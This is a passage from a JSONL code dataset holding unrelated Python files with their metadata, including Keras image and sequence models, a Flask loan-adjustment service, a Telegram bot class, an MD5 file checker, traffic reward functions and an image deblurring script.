range(1, lim-1):\n if d != i[l]-i[l+1]:\n return False\n return True\n\nN = int(input())\nif N < 100:\n print(N)\nelse:\n ans = 99\n for n in range(100, N+1):\n if seq(str(n)):\n ans += 1\n print(ans)\n ","sub_path":"BOJ/201902/1065.py","file_name":"1065.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346417840","text":"#data preprocessing\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\ntrain_datagen = ImageDataGenerator(rescale=1.0/255,shear_range=0.2,zoom_range=0.2,horizontal_flip=True)\r\ntrain_generator = train_datagen.flow_from_directory(r\"train_data_dir\",target_size=(150,150),batch_size=30,class_mode=\"categorical\")\r\nvalid_datagen = ImageDataGenerator(rescale=1.0/255)\r\nvalid_generator = train_datagen.flow_from_directory(r\"valid_data_dir\",target_size=(150,150),batch_size=25,class_mode=\"categorical\")\r\n\r\n#import VGG16\r\nfrom keras.applications import VGG16\r\n\r\nvgg16_model = VGG16(include_top=False,weights=\"imagenet\",input_shape=(150,150,3))\r\n\r\n#VGG16+FC\r\nfrom keras import models\r\nfrom keras import layers\r\nfrom keras import regularizers\r\n\r\nmodel = models.Sequential()\r\nmodel.add(vgg16_model)\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dropout(0.2))\r\nmodel.add(layers.Dense(128,activation=\"relu\",kernel_regularizer=regularizers.l2(0.01)))\r\nmodel.add(layers.Dropout(0.5))\r\nmodel.add(layers.Dense(20,activation=\"softmax\"))\r\n\r\nvgg16_model.trainable = True\r\n\r\nset_trainable = False\r\nfor layer in vgg16_model.layers:\r\n if layer.name == 'block5_conv1':\r\n set_trainable = True\r\n if set_trainable:\r\n layer.trainable = True\r\n else:\r\n layer.trainable = False\r\n\r\n#training\r\nfrom keras.optimizers import SGD\r\nfrom keras.callbacks import EarlyStopping\r\n\r\nearly_stopping = EarlyStopping(patience=10, verbose=1)\r\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=SGD(lr=0.0001,momentum=0.9),metrics=[\"acc\"])\r\nhistory = model.fit_generator(train_generator,steps_per_epoch=1500,epochs=200,validation_data=valid_generator,validation_steps=200,verbose=1,callbacks=[early_stopping])\r\n\r\nmodel.save(\"model_earlystopping.h5\")\r\n\r\n#plot images\r\nimport matplotlib.pyplot as plt\r\n\r\nhistory_dict = history.history\r\nloss_values = history_dict[\"loss\"]\r\nval_loss_values = history_dict[\"val_loss\"]\r\nacc_values = history_dict[\"acc\"]\r\nval_acc_values = history_dict[\"val_acc\"]\r\n\r\nepochs = range(1,len(loss_values)+1)\r\nplt.plot(epochs,loss_values,\"bo\",label=\"Training Loss\")\r\nplt.plot(epochs,val_loss_values,\"b\",label=\"Validation Loss\")\r\nplt.xlabel(\"Epochs\")\r\nplt.ylabel(\"Loss\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(epochs,acc_values,\"bo\",label=\"Training Acc\")\r\nplt.plot(epochs,val_acc_values,\"b\",label=\"Validation Acc\")\r\nplt.xlabel(\"Epochs\")\r\nplt.ylabel(\"Acc\")\r\nplt.legend()\r\nplt.show()\r\n","sub_path":"vgg16+fc.py","file_name":"vgg16+fc.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253568883","text":"# -*- coding: utf-8 -*-\n\"\"\"\n yinsho.services.AdjustmentService\n #####################\n yinsho LoanService module\n\"\"\"\nimport hashlib, copy\nfrom flask import json, g\nfrom sqlalchemy import and_\nfrom ..model.credit import *\nfrom ..model.transaction import *\nfrom ..model.application import *\nfrom ..model.creditLevel import *\nfrom ..workflow import task\nfrom ..workflow.parameter import *\nfrom ..database.sqlal import simple_session\n\nimport decimal\nfrom decimal import Decimal\nimport datetime\nimport random\n\nclass AdjustmentService():\n\n def save(self,**kwargs):\n u''' 授信金额调整保存 '''\n lend_transaction=kwargs.get('lend_transaction')\n adjustment=kwargs.get('adjustment') \n application=g.db_session.query(Application).join(ApplicationTransaction,ApplicationTransaction.application_id==Application.id).filter(ApplicationTransaction.transaction_id==lend_transaction.get('application_transaction_id')).first()\n app =Application(status=u'暂存',customer=application.customer,product_code='973')\n at = ApplicationTransaction(application=app,transaction_name=u\"%s授信金额调整申请\"%(application.customer.party.name)) \n g.db_session.add(at)\n g.db_session.commit()\n adjustment.update({\n 'lend_transaction_id':lend_transaction.get('transaction_id'),\n 'application_transaction_id':at.transaction_id, \n })\n cate = Adjustment(**adjustment)\n g.db_session.add(cate)\n g.db_session.commit()\n return {'adjustment':cate,'application':app}\n\n\n def update(self,**kwargs):\n u'''跟新授信金额调整内容 '''\n adjustment=kwargs.get('adjustment')\n id = adjustment.get('id')\n adjustment.pop('id') \n adjustment.pop('application_transaction') \n adjustment.pop('lend_transaction')\n #adjustment.pop('adjustment_book')\n g.db_session.query(Adjustment).filter(Adjustment.id==id).update(adjustment)\n return {'success':True}\n\n def submit(self, **kwargs):\n u''' 授信金额调整申请提交 '''\n adjustment=kwargs.get('adjustment')\n start_activity = g.db_session.query(Activity).join(Workflow, Workflow.start_activity_id == Activity.activity_id).filter(Workflow.workflow_name==u\"授信调整流程\").first()\n cl=g.db_session.query(Adjustment).filter(Adjustment.id == adjustment.get('id')).first()\n at=cl.application_transaction\n start(at, start_activity) \n g.db_session.query(Application).filter(Application.id == at.application_id).update({'status':u'申请'}) \n return {'success':True}\n\n\n def save_submit(self,**kwargs):\n u''' 授信金额调整申请保存后提交 '''\n r = self.save(**kwargs) \n adjustment=r.get('adjustment')\n start_activity = g.db_session.query(Activity).join(Workflow, Workflow.start_activity_id == Activity.activity_id).filter(Workflow.workflow_name==u\"授信调整流程\").first()\n cl=g.db_session.query(Adjustment).filter(Adjustment.id == adjustment.id).first()\n at=cl.application_transaction\n start(at, start_activity)\n app=g.db_session.query(Application).filter(Application.id == at.application_id).update({'status':u'申请'})\n return {'adjustment':adjustment,'application':app}\n\n def query(self, **kwargs):\n u''' 查询授信金额调整列表 '''\n q = g.db_session.query(Adjustment).all()\n rst_list=[{'adjustment':r,'lend_transaction':r.lend_transaction,'party':r.lend_transaction.application_transaction.application.customer.party,'application':r.application_transaction.application,'product':r.lend_transaction.application_transaction.application.product } for r in q] \n return rst_list\n\n def query_by_id(self,application_id):\n u'''根据application_id授信金额调整内容 '''\n r = g.db_session.query(Adjustment).join(ApplicationTransaction,ApplicationTransaction.transaction_id==Adjustment.application_transaction_id).filter(ApplicationTransaction.application_id==application_id).first()\n rst_data={'adjustment':r,'lend_transaction':r.lend_transaction,'party':r.lend_transaction.application_transaction.application.customer.party,'application':r.application_transaction.application,'product':r.lend_transaction.application_transaction.application.product} \n return rst_data \n\n","sub_path":"src_20170503/src/web/server/fabs/services/adjustment.py","file_name":"adjustment.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"240680832","text":"# working folder, containing xlsx files (all subfolders will be included)\nFOLDER = '/media/sf_Shared/reports'\n\n# name of the sheet in xlsx workbook\nSHEET_NAME = 'Sheet1'\n\n# name of the table in database\nTABLE_NAME = 'reports_test'\n\n# name of the fields in the table in the database\nFIELD_NAMES = 'object_id, object_name, customer_id, customer_name, contractor_id, ' \\\n 'contractor_name, category, status, date'\n\n# number of spawning processes\nNUMBER_OF_DAEMONS = 4\n\n# number of the rows in xlsx file before first row with data\nFIELD_NAMES_OFFSET = 1\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"4140833","text":"# -*- coding: utf-8 -*-\n# Author: XuMing \n# Brief: 深度网络学习加法运算\n\n# input '100+100'\n# output '200'\n\nimport numpy as np\nfrom keras import layers\nfrom keras.models import Sequential\nfrom six.moves import range\n\n\nclass CharTable(object):\n \"\"\"\n Give a set of chars:\n encode chars to a one hot integer representation\n decode the one hot integer representation to their char output\n decode a vector of probs to their char output\n \"\"\"\n\n def __init__(self, chars):\n self.chars = sorted(set(chars))\n self.char_indices = dict((c, i) for i, c in enumerate(self.chars))\n self.indices_char = dict((i, c) for i, c in enumerate(self.chars))\n\n def encode(self, C, num_rows):\n \"\"\"\n One hot encode given string C.\n :param C:\n :param num_rows: number of rows in the returned one hot encoding.\n :return:\n \"\"\"\n x = np.zeros((num_rows, len(self.chars)))\n for i, c in enumerate(C):\n x[i, self.char_indices[c]] = 1\n return x\n\n def decode(self, x, calc_argmax=True):\n if calc_argmax:\n x = x.argmax(axis=-1)\n return ''.join(self.indices_char[x] for x in x)\n\n\n# parameters\nTRAINING_SIZE = 50000\nDIGITS = 3 # max output is 999+999=1998\nINVERT = True\n\nMAXLEN = DIGITS + 1 + DIGITS\nchars = '0123456789+ '\nctable = CharTable(chars)\n\nquestions = []\nexpected = []\nseen = set()\nprint('make data...')\nwhile len(questions) < TRAINING_SIZE:\n f = lambda: int(''.join(np.random.choice(list('0123456789'))\n for i in range(np.random.randint(1, DIGITS + 1))))\n a, b = f(), f()\n # skip questions have seen\n # skip any such as 'a+b=b+a'\n key = tuple(sorted((a, b)))\n if key in seen:\n continue\n seen.add(key)\n # pad the data with spaces such that it is always maxlen\n q = '{}+{}'.format(a, b)\n query = q + ' ' * (MAXLEN - len(q))\n ans = str(a + b)\n # answers: max size of digits+1\n ans += ' ' * (DIGITS + 1 - len(ans))\n if INVERT:\n query = query[::-1]\n questions.append(query)\n expected.append(ans)\nprint('TOTAL questions:', len(questions))\n\nprint('vector...')\nx = np.zeros((len(questions), MAXLEN, len(chars)), dtype=np.bool)\ny = np.zeros((len(questions), DIGITS + 1, len(chars)), dtype=np.bool)\nfor i, sentence in enumerate(questions):\n x[i] = ctable.encode(sentence, MAXLEN)\nfor i, sentence in enumerate(expected):\n y[i] = ctable.encode(sentence, DIGITS + 1)\n\n# shuffle (x,y)\nindices = np.arange(len(y))\nnp.random.shuffle(indices)\nx = x[indices]\ny = y[indices]\n\n# explicitly set apart 10% for valid\nsplit_at = len(x) - len(x) // 10\n(x_train, x_val) = x[:split_at], x[split_at:]\n(y_train, y_val) = y[:split_at], y[split_at:]\n\nprint('training data:')\nprint(x_train.shape)\nprint(y_train.shape)\nprint('val data:')\nprint(x_val.shape)\nprint(y_val.shape)\n\n# RNN, replace by GRU or SimpleRNN\nRNN = layers.LSTM\nHIDDEN_SIZE = 128\nBATCH_SIZE = 128\nLAYERS = 1\n\nprint('Build model...')\nmodel = Sequential()\n# encode the input sentence\nmodel.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))\n# same as the decoder RNN input, repeatedly provide the last hidden state of RNN for each time step\n# repeat 'digits+1' times to the max length of output\nmodel.add(layers.RepeatVector(DIGITS + 1))\nfor i in range(LAYERS):\n # return sequences of (num_samples, timesteps, output_dim)\n model.add(RNN(HIDDEN_SIZE, return_sequences=True))\n\n# apply a dense layer to the every temporal slice of an input.\nmodel.add(layers.TimeDistributed(layers.Dense(len(chars))))\nmodel.add(layers.Activation('softmax'))\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\n# train\nfor iteration in range(1, 20):\n print()\n print('-')\n print('iteration', iteration)\n model.fit(x_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=1,\n validation_data=(x_val, y_val))\n # select 10 sample from the validation set at random to visualize errors\n for i in range(10):\n ind = np.random.randint(0, len(x_val))\n rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]\n preds = model.predict_classes(rowx, verbose=0)\n q = ctable.decode(rowx[0])\n correct = ctable.decode(rowy[0])\n guess = ctable.decode(preds[0], calc_argmax=False)\n print('Q', q[::-1] if INVERT else q, end=' ')\n print('T', correct, end=' ')\n if correct == guess:\n print('\\033[92m' + '☑' + '\\033[0m', end=' ')\n else:\n print('\\033[91m' + '☒' + '\\033[0m', end=' ')\n print(guess)\n","sub_path":"07keras/12rnn_num_add.py","file_name":"12rnn_num_add.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111113427","text":"#通用set函数\n\ndef intersect(*args):\n res=[]\n for x in args[0]:\n for other in args[1:]:\n if x not in other:\n break\n else:\n res.append(x)\n return res\n\n\ndef uniion(*args):\n res=[]\n for seq in args:\n for x in seq:\n if not x in res:\n res.append(x)\n\n return res\n\nif __name__=='__main__':\n s1,s2,s3='SPAM','SCAM','SLAM'\n print(intersect(s1,s2,s3))\n print(uniion(s1,s2,s3))\n numa,numb=[1,2,3],(1,4)\n print(intersect(numa,numb))\n\n","sub_path":"day10/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468829220","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ncurrent_users = ['admin','joe','ajay','marry','ariana']\nif current_users:\n\tfor user in current_users:\n\t\tif user == 'admin':\n\t\t\tprint(\"Hello \" + user + \",would you like to see a status report?\")\n\t\telse:\n\t\t\tprint(\"Hello \" + user + \",thank you for logging in again\")\nelse:\n\tprint(\"we need to find some users!\")\n\t\nnew_users = ['Joe','jack','jim','marry','mariah']\nfor new_user in new_users:\n\tif new_user.lower() in current_users:\n\t\tprint(\"The name has been occupied\")\n\telse:\n\t\tprint(\"The name is avaluable\")","sub_path":"hello_users.py","file_name":"hello_users.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131847909","text":"#! Flux3D 12.0\nimport math\nimport time\n\n#from Definitions_and_functions import *\ndef print_time_hms( time_sec ):\n \"This prints time_sec in hour-min-sec format\"\n if(time_sec >= 60.0 and time_sec < 3600.0):\n total_time_minutes = int(math.floor(time_sec/60.0))\n total_time_secondes = int(round(60*(time_sec/60.0-total_time_minutes)))\n return str(total_time_minutes)+\" min \"+str(total_time_secondes)+\" sec \\n\"\n elif(time_sec >= 3600.0):\n total_time_hours = time_sec/3600.0\n total_time_minutes = 60*(total_time_hours-math.floor(total_time_hours))\n total_time_secondes = 60*(total_time_minutes-math.floor(total_time_minutes))\n return str(int(total_time_hours))+\" h \"+str(int(total_time_minutes))+\" min \"+str(int(total_time_secondes))+\" sec \\n\"\n else:\n return \"%0.1f s \\n\" % time_sec\n\n\n\nt = time.time()\n\nnewProject()\n## start scripting\n\nexecuteBatchSpy('1_param_revF.py') \t\t# Defines different parameters\ntime_params = time.time() - t\n\nexecuteBatchSpy('2_app_def.py') \t\t\t# Defines different parameters\ntime_app_def= time.time() - t\n\nexecuteBatchSpy('3_mesh_info.py') \t\t# Defines different parameters\ntime_mesh = time.time() - t\n\nexecuteBatchSpy('4_geom_revE.py') \t\t# Defines different parameters\ntime_geometry = time.time() - t\n\nexecuteBatchSpy('5_mat_def.py') \t\t\t# Defines different parameters\ntime_materials = time.time() - t\n\nexecuteBatchSpy('6_coils_concentric_revF.py') # Defines different parameters\n\nexecuteBatchSpy('7_assign_revB.py') # Defines different parameters\n\nexecuteBatchSpy('8_sensors.py') # Defines different parameters\n\nexecuteBatchSpy('9_make_scenarios_passive_revC.py') # Defines different parameters\n\nexecuteBatchSpy('10_make_scenarios_active_revC.py') # Defines different parameters\n\n\nt = time.time()\n\nmeshDomain()\n\ngenerateSecondOrderElements()\n\n#saveProjectAs(project_path+project_name)\nif(solving):\n\tsaveProjectAs(project_path+project_name)\n # SCENARII\n\t#executeBatchSpy('Reference_values.py') # Execute a reference values scenario\n\t#executeBatchSpy('Rotor_rotation.py') # Execute a rotor rotation scenario\n #executeBatchSpy('PM_magnetisation_rotation.py') # Execute a PM magnetisation rotation scenario\n # POSTPROCESSING\n #executeBatchSpy('Coil_fluxes.py') # Computation of the coil fluxes\n #executeBatchSpy('EM_torque.py') # Computation of the electromagetic\n\t#executeBatchSpy('Cut_plans_induction.py') # Display of induction cut plans\n\ntime_solving = time.time() - t\n\n# total_time = time_params+time_app_def+time_mesh+time_geometry+time_materials+time_electric_circuit_assign+time_scenarios\n\nprint(\"\\n\")\nprint(\"Time for initialisation: \"+print_time_hms(time_initialisation))\nprint(\"Time for building the geometry: \"+print_time_hms(time_geometry))\nprint(\"Time for building the mesh: \"+print_time_hms(time_mesh))\nprint(\"Time for physics: \"+print_time_hms(time_materials))\nprint(\"Time for solving: \"+print_time_hms(time_solving))\nprint(\"\\n\")\nprint(\"Total time: \"+print_time_hms(total_time))","sub_path":"2_int_rotor/2_int_rotor_slotted/4_icems/00_main.py","file_name":"00_main.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159513302","text":"import hashlib\nimport logging\n\n\ndef get_md5(file_path):\n hash_md5 = hashlib.md5()\n with open(file_path, \"rb\") as file:\n for chunk in iter(lambda: file.read(4096), b\"\"):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\n\ndef save_md5_to_txt(md5, output_path):\n with open(output_path, 'w', encoding='utf-8') as file:\n file.write(md5)\n\ndef get_md5_regex_pattern():\n return r\"([a-fA-F\\d]{32})\"\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format='%(name)s: %(message)s',\n )\n logging.info(\"Starting...\")\n file_path = '/data/4chanWebScrapper.zip'\n output_path = '/data/md5_of_zip.txt'\n md5 = get_md5(file_path)\n logging.info(f\"MD5 of file: [MD5={md5}]\")\n save_md5_to_txt(md5, output_path)\n logging.info(\"Finished\")\n","sub_path":"Server/md5checker.py","file_name":"md5checker.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87862412","text":"\"\"\"A series of reward functions.\"\"\"\n\nfrom flow.core.params import SumoParams\nfrom gym.spaces import Box, Tuple\nimport numpy as np\n\nfrom collections import defaultdict\nfrom functools import reduce\n\nfrom requests import head\n\n\nACC = 5.4\n\ndef total_lc_reward(env, rl_action):\n reward_dict = {\n 'rl_desired_speed': rl_desired_speed(env),\n 'rl_action_penalty': rl_action_penalty(env, rl_action),\n 'uns4IDM_penalty': unsafe_distance_penalty4IDM(env),\n 'meaningless_penalty': meaningless_penalty(env),\n 'target_velocity': target_velocity(env),\n }\n return reward_dict\n\n\ndef target_velocity(env):\n\n return 0\n\n\ndef rl_desired_speed(env, rl):\n vel = np.array(env.k.vehicle.get_speed(rl))\n rl_des = env.initial_config.reward_params.get('rl_desired_speed', 0)\n target_vel = env.env_params.additional_params['target_velocity']\n regulation_speed = env.initial_config.reward_params.get('regulation_speed', 0)\n\n if rl_des == 0:\n return 0\n\n if vel < -100:\n return 0.\n\n if vel <= target_vel:\n cost = vel\n rwd = cost/target_vel\n else:\n cost = regulation_speed-vel\n rwd = cost/(regulation_speed-target_vel)\n\n return rl_des*rwd\n\n\ndef unsafe_distance_penalty4IDM(env, prev_lane, now_lane, tail_way, tail_speed, prev_lane_nums, now_lane_nums, rl):\n uns4IDM_p = env.initial_config.reward_params.get('uns4IDM_penalty', 0)\n\n # Parameter of IDM\n T = 1\n a = b = ACC\n s0 = 5.45\n v = env.k.vehicle.get_speed(rl)\n tw = tail_way\n\n rwd = 0\n if tail_speed < 0:\n rwd = 0.\n\n else:\n s_star = 0\n # (prev_lane != now_lane) means that the agent have executed lane-changing\n # (prev_lane_nums == now_lane_nums) means that the number of lanes on the road is same before\n # It only work in the lane reduction scenario\n if (prev_lane != now_lane) and (prev_lane_nums == now_lane_nums):\n if abs(tw) < 1e-3:\n tw = 1e-3\n rwd = -3.\n\n else:\n follow_vel = tail_speed\n s_star = s0 + max(\n 0, follow_vel * T + follow_vel * (follow_vel - v) / (2 * np.sqrt(a * b)))\n rwd = uns4IDM_p * max(-3, min(0, 1 - (s_star / tw) ** 2))\n\n return rwd\n\n\ndef leader_unsafe_distance_penalty(env, headway, rl_speed, leader_speed, veh_length):\n leader_uns_p = env.initial_config.reward_params.get('leader_uns_penalty', 0)\n\n # Parameter of IDM\n T = 1\n a = b = ACC\n s0 = 5.45\n\n # exception case: when the agent don't observe the leading vehicle on same lane\n if leader_speed < 0:\n return 0.\n\n s_star = s0 + max(\n 0, rl_speed * T + rl_speed * (rl_speed - leader_speed) / (2 * np.sqrt(a * b)))\n\n if headway > s_star:\n rwd = 0.\n\n else:\n rwd = leader_uns_p * max(-5, min(0, 1 - (s_star / headway) ** 2))\n\n return rwd\n\n\ndef rl_action_penalty(env, actions, rl):\n action_penalty = env.initial_config.reward_params.get('rl_action_penalty', 0)\n\n if actions is None or action_penalty == 0:\n return 0\n\n actions = actions[rl]\n\n # boolean condition\n if len(actions) == 2:\n direction = actions[1::2]\n for i in range(len(direction)):\n if direction[i] <= -0.333:\n direction[i] = -1\n elif direction[i] >= 0.333:\n direction[i] = 1\n else:\n direction[i] = 0\n\n elif len(actions) == 4:\n direction = actions[1:]\n\n if direction[0] == 1:\n direction = np.array([-1])\n elif direction[1] == 1:\n direction = np.array([0])\n else:\n direction = np.array([1])\n\n reward = 0\n if direction:\n if env.k.vehicle.get_previous_lane(rl) == env.k.vehicle.get_lane(rl):\n reward -= action_penalty\n\n return reward\n\n\ndef meaningless_penalty(env, prev_lane, now_lane, prev_headway, headway, prev_lane_nums,\n now_lane_nums, rl, visibility_length):\n mlp = env.initial_config.reward_params.get('meaningless_penalty', 0)\n reward = 0\n lc_pen = 0\n\n if mlp:\n if (prev_lane != now_lane) and (prev_lane_nums == now_lane_nums):\n headway_criterion = headway - prev_headway\n semi_reward = - (headway_criterion - lc_pen)\n reward -= mlp * (semi_reward / visibility_length)\n\n return reward","sub_path":"flow/flow/core/MA_ring_rewards.py","file_name":"MA_ring_rewards.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562588763","text":"import logging\nimport os\nimport pkgutil\nfrom functools import partial\n\nimport attr\nfrom telegram.error import (\n BadRequest,\n ChatMigrated,\n NetworkError,\n TelegramError,\n TimedOut,\n Unauthorized,\n)\nfrom telegram.ext import (\n CommandHandler,\n Filters,\n InlineQueryHandler,\n MessageHandler,\n Updater,\n)\n\nlogger = logging.getLogger(\"rich\")\n\nhere = os.path.abspath(os.path.dirname(__file__))\nget_path = partial(os.path.join, here)\n\n\n@attr.s(auto_attribs=True)\nclass TelegramBot:\n \"\"\"Just a class for python-telegram-bot\"\"\"\n\n token: str\n eduzen_id: int = 3652654\n heroku: int = 0\n port: int = 80\n workers: int = 4\n use_context: bool = True\n updater: Updater = None\n\n def __attrs_post_init__(self):\n try:\n self.updater = Updater(token=self.token, workers=self.workers, use_context=self.use_context)\n except TelegramError:\n logger.exception(\"Something wrong...\")\n raise SystemExit\n\n logger.info(\"[bold green]Created updater for %s\" % (self.updater.bot.name), extra={\"markup\": True})\n self.updater.dispatcher.add_error_handler(self.error)\n self._load_plugins()\n\n def start(self):\n if not self.heroku:\n self.updater.start_polling()\n else:\n self.updater.start_webhook(listen=\"0.0.0.0\", port=self.port, url_path=self.token)\n self.updater.bot.setWebhook(f\"https://eduzenbot.herokuapp.com/{self.token}\")\n self.send_msg_to_eduzen(\"eduzen_bot reiniciado!\")\n self.updater.idle()\n\n def error(self, update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n try:\n raise context.error\n except Unauthorized:\n # remove update.message.chat_id from conversation list\n logger.error(\"Update caused Unauthorized error\")\n except BadRequest:\n # handle malformed requests - read more below!\n logger.error(f\"Update {update} caused error {context.error}\")\n except TimedOut:\n # handle slow connection problems\n logger.warning(f\"Update {update} caused TimedOut {context.error}\")\n except NetworkError:\n # handle other connection problems\n logger.error(f\"Update {update} caused error {context.error}\")\n except ChatMigrated:\n # the chat_id of a group has changed, use e.new_chat_id instead\n logger.error(f\"Update {update} caused error {context.error}\")\n except TelegramError:\n # handle all other telegram related errors\n logger.error(f\"Update {update} caused error {context.error}\")\n\n def add_handler(self, handler):\n self.updater.dispatcher.add_handler(handler)\n\n def add_list_of_handlers(self, handlers):\n for handler in handlers:\n self.add_handler(handler)\n\n def send_msg(self, msg):\n self.updater.bot.send_message(msg)\n\n def send_msg_to_eduzen(self, msg):\n logger.info(\"aviso a eduzen\")\n self.updater.bot.send_message(self.eduzen_id, msg)\n\n def create_command(self, name, func):\n return CommandHandler(name, func, pass_args=True, pass_chat_data=True, run_async=True)\n\n def create_command_args(self, name, func, pass_args=True, pass_job_queue=True, pass_chat_data=True):\n return CommandHandler(\n name,\n func,\n pass_args=pass_args,\n pass_job_queue=pass_job_queue,\n pass_chat_data=pass_chat_data,\n run_async=True,\n )\n\n def create_inlinequery(self, func):\n return InlineQueryHandler(func)\n\n def create_list_of_commands(self, kwargs):\n return [self.create_command(key, value) for key, value in kwargs.items()]\n\n def create_msg(self, func, filters=Filters.text):\n return MessageHandler(filters, func)\n\n def create_list_of_msg_handlers(self, args):\n return [self.create_msg(value) for value in args]\n\n def register_commands(self, kwargs):\n commands = self.create_list_of_commands(kwargs)\n self.add_list_of_handlers(commands)\n\n def register_message_handler(self, args):\n msgs = self.create_list_of_msg_handlers(args)\n self.add_list_of_handlers(msgs)\n\n def _get_commands(self, plugin):\n plugins = {}\n for line in plugin.__doc__.strip().splitlines():\n command = [substring.strip() for substring in line.strip().split(\"-\")]\n plugins[command[0]] = getattr(plugin, command[1])\n return plugins\n\n def _get_plugins(self):\n plugins = {}\n plugins_path = get_path(\"plugins/commands\")\n for importer, package_name, _ in pkgutil.iter_modules([plugins_path]):\n logger.info(f\"Loading {package_name}...\")\n sub_modules = get_path(plugins_path, package_name)\n importer.find_module(package_name).load_module(package_name)\n for importer, package_name, _ in pkgutil.iter_modules([sub_modules]):\n plugin = importer.find_module(package_name).load_module(package_name)\n if not plugin.__doc__:\n continue\n\n plugins.update(self._get_commands(plugin))\n\n return plugins\n\n def _load_plugins(self):\n logger.info(\"Loading plugins...\")\n plugins = self._get_plugins()\n logger.info(\"Registering commands!\")\n self.register_commands(plugins)\n logger.info(\"Commands added!\")\n","sub_path":"eduzen_bot/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"476641059","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n'''\n@author: Jackie Chen\n@Time: 17/12/11\n@File: blur.py\n@Project: pattern-recognize\n'''\nfrom skimage import io,data,filters,color\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\ndef PSFestiamte(C,PSF,Fw,beta,noiseLevel):\n F = np.fft.fft2(np.zeros(np.shape(C)))\n Cabs = np.abs(C)\n Gwabs = np.abs(PSF)\n cond0 = (Cabs < noiseLevel)\n cond1 = (Gwabs >= Cabs) & (~cond0)\n cond2 = (Gwabs < Cabs) & (~cond0)\n F[cond0] = Fw[cond0]\n F[cond1] = (1.-beta)*Fw[cond1] + beta*np.divide(C[cond1], PSF[cond1])\n tmp = np.divide((1.-beta), (Fw[cond2] +\n np.divide(beta*PSF[cond2],C[cond2])))\n F[cond2] = np.divide(1.,tmp)\n return F\n\ndef blur():\n #blur\n #img = data.chelsea()\n img = data.chelsea()\n #img = color.rgb2gray(img)\n #img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #img = color.rgb2gray(img)\n img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n kernel = np.ones((5,5),np.float32)/16\n #multi method for blur\n #dst = cv2.filter2D(img,-1,kernel)\n\n dst_color = cv2.GaussianBlur(data.chelsea(),(5,5),0)\n dst = cv2.GaussianBlur(img,(5,5),0) #image after Gaussian Blur\n dst_tmp = dst\n #restore\n\n pw = cv2.bilateralFilter(img,9,15,15)\n #compare to bilateralFilter used by opencv\n size_psf = 12\n wpsf = np.zeros(np.shape(dst))\n wpsf[0:size_psf,0:size_psf] = 1\n\n beta = 0.8 #param for iteration\n noiseLevel = 1\n itertime = 40\n fw = dst\n C = np.fft.fft2(dst)\n PSF = np.zeros(np.shape(C)) #PSF=GW\n\n for i in range(itertime):\n Fw = np.fft.fft2(dst)\n #print Fw\n G = PSFestiamte(C,Fw,PSF,beta,noiseLevel)\n g = np.real(np.fft.ifft2(G))\n gw = g\n #print gw\n\n for i in range(gw.shape[0]):\n for j in range(gw.shape[1]):\n if gw[i,j] < 0.:\n gw[i,j] = 0\n gw = gw*wpsf\n gw_sum = np.sum(gw)\n gw = gw/gw_sum\n Gw = np.fft.fft2(gw)\n\n F = PSFestiamte(C,Gw,Fw,beta,noiseLevel)\n f = np.real(np.fft.ifft2(F))\n fw = f\n for i in range(fw.shape[0]):\n for j in range(fw.shape[1]):\n if fw[i,j] < 0.:\n fw[i,j] = 0\n E = np.sum(np.abs(fw)-np.abs(f))\n fw = fw + E/(np.shape(img)[0]*np.shape(img)[1])\n\n plt.subplot(221),plt.imshow(data.chelsea())\n plt.title('init')\n plt.subplot(222),plt.imshow(dst_color)\n plt.title('GaussianBlur')\n plt.subplot(223),plt.imshow(dst_tmp,cmap='gray')\n plt.title('GaussianBlur_Gray')\n plt.subplot(224),plt.imshow(fw,cmap='gray')\n plt.title('recovery')\n plt.show()","sub_path":"src/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236830702","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as 